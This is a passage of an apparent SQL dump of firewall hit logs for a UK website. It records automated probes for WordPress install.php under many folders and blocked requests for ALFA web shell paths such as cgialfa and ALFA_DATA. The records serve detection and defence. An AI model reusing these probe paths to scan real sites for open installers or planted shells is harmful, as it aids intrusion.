en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3NhbmRib3gvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"path\":\"L3NhbmRib3gvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11302,1673922680.782185,1673922680.647600,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/sandbox/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3NhbmRib3gvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"path\":\"L3NhbmRib3gvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11303,1673922677.807046,1673922677.635100,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/Paiement/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L1BhaWVtZW50L3dwLWFkbWluL2luc3RhbGwucGhw\",\"path\":\"L1BhaWVtZW50L3dwLWFkbWluL2luc3RhbGwucGhw\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11304,1673922677.806908,1673922677.635100,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/Paiement/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L1BhaWVtZW50L3dwLWFkbWluL2luc3RhbGwucGhw\",\"path\":\"L1BhaWVtZW50L3dwLWFkbWluL2luc3RhbGwucGhw\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11305,1673922674.505409,1673922674.333400,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/oldsite/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L29sZHNpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"path\":\"L29sZHNpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11306,1673922674.505247,1673922674.333400,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/oldsite/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L29sZHNpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"path\":\"L29sZHNpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11307,1673922671.441699,1673922671.278300,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/site/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3NpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"path\":\"L3NpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11308,1673922671.441597,1673922671.278300,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/site/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3NpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"path\":\"L3NpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11309,1673922668.417668,1673922668.299000,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/backup/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L2JhY2t1cC93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"path\":\"L2JhY2t1cC93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11310,1673922668.417575,1673922668.299000,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/backup/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L2JhY2t1cC93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"path\":\"L2JhY2t1cC93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11311,1673922665.574628,1673922665.459700,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/web/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dlYi93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"path\":\"L3dlYi93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11312,1673922665.574497,1673922665.459700,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/web/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dlYi93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"path\":\"L3dlYi93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11313,1673922662.649348,1673922662.525700,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/cms/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L2Ntcy93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"path\":\"L2Ntcy93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11314,1673922662.649202,1673922662.525700,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/cms/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L2Ntcy93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"path\":\"L2Ntcy93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11315,1673922659.688115,1673922659.564300,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/blog/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L2Jsb2cvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"path\":\"L2Jsb2cvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11316,1673922659.688020,1673922659.564300,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/blog/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L2Jsb2cvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"path\":\"L2Jsb2cvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11317,1673922656.734971,1673922656.601900,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/test/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3Rlc3Qvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"path\":\"L3Rlc3Qvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11318,1673922656.734857,1673922656.601900,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/test/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3Rlc3Qvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"path\":\"L3Rlc3Qvd3AtYWRtaW4vaW5zdGFsbC5waHA=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11319,1673922653.779120,1673922653.610000,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/wordpress/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dvcmRwcmVzcy93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"path\":\"L3dvcmRwcmVzcy93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11320,1673922653.778985,1673922653.610000,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/wordpress/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dvcmRwcmVzcy93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"path\":\"L3dvcmRwcmVzcy93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11321,1673922650.416262,1673922650.236100,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/old/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L29sZC93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"path\":\"L29sZC93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11322,1673922650.416169,1673922650.236100,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/old/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L29sZC93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"path\":\"L29sZC93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11323,1673922646.882495,1673922646.700700,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/new/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L25ldy93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"path\":\"L25ldy93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11324,1673922646.882342,1673922646.700700,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/new/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L25ldy93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"path\":\"L25ldy93cC1hZG1pbi9pbnN0YWxsLnBocA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11325,1673922643.764158,1673922643.641100,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/wp/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwL3dwLWFkbWluL2luc3RhbGwucGhw\",\"path\":\"L3dwL3dwLWFkbWluL2luc3RhbGwucGhw\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11326,1673922643.764037,1673922643.641100,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/wp/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"logged|506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwL3dwLWFkbWluL2luc3RhbGwucGhw\",\"path\":\"L3dwL3dwLWFkbWluL2luc3RhbGwucGhw\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11327,1673924302.520985,1673924302.361000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11328,1673924301.383809,1673924301.250200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11329,1673924300.311005,1673924300.182000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11330,1673924299.204710,1673924299.094700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11331,1673924297.694444,1673924297.548000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11332,1673924295.390945,1673924295.275600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11333,1673924294.157798,1673924294.036900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11334,1673924293.080737,1673924292.965500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11335,1673924292.021588,1673924291.896900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11336,1673924290.968281,1673924290.827900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11337,1673924289.835612,1673924289.725500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11338,1673924288.559381,1673924288.449700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11339,1673924287.421354,1673924287.302300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11340,1673924286.132426,1673924286.015000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11341,1673924285.008118,1673924284.890800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11342,1673924282.589725,1673924282.455000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11343,1673924274.651701,1673924274.510200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11344,1673924270.567986,1673924270.450500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11345,1673924269.512174,1673924269.380800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11346,1673924267.990526,1673924267.875300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 